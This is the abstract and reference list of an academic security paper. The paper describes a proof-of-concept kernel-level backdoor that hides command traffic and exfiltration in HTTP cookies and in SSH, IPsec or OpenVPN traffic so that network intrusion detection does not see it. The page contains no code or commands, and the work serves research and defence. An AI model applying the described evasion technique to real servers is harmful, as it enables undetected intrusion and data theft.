Covert remote syscall communication at kernel level: A SPOOKY backdoor

Malware today often uses very sophisticated methods to avoid being detected on the victim machine itself. However, hiding the actual communication between an attacker and his malware is often neglected by malware authors. As a consequence, intermediate hosts inspecting the incoming and outgoing traffic of the victim host may be able to detect the infection. In this paper, we describe a proof-of-concept server backdoor which hides the in- and exfiltration of data in incoming and outgoing benign traffic of the victim server. Using a low-traffic system call proxy, our backdoor allows the remote execution of arbitrary programs on the victim server without being detectable by network intrusion detection systems. We implement our proof-of-concept backdoor using the HTTP protocol's Cookie-header and evaluate it against the SNORT network intrusion detection system. In addition, we show how to use other widespread services such as SSH, IPsec, and OpenVPN to conceal the attacker's communication and briefly discuss countermeasures.

[1]  Yun Q. Shi,et al.  Detecting Covert Channels in Computer Networks Based on Chaos Theory , 2013, IEEE Transactions on Information Forensics and Security.

[2]  Aurélien Francillon,et al.  Implementation and implications of a stealth hard-drive backdoor , 2013, ACSAC.

[3]  Angelos Stavrou,et al.  SPECTRE: A dependable introspection framework via System Management Mode , 2013, 2013 43rd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN).

[4]  Pradeep Padala,et al.  Playing with ptrace, Part II , 2002 .

[5]  Mordechai Guri,et al.  AirHopper: Bridging the air-gap between isolated networks and mobile phones using radio frequencies , 2014, 2014 9th International Conference on Malicious and Unwanted Software: The Americas (MALWARE).

[6]  Cliff Changchun Zou,et al.  SMM rootkits: a new breed of OS independent malware , 2008, SecureComm.

[7]  Helen J. Wang,et al.  SubVirt: implementing malware with virtual machines , 2006, 2006 IEEE Symposium on Security and Privacy (S&P'06).

[8]  Mordechai Guri,et al.  BitWhisper: Covert Signaling Channel between Air-Gapped Computers Using Thermal Manipulations , 2015, 2015 IEEE 28th Computer Security Foundations Symposium.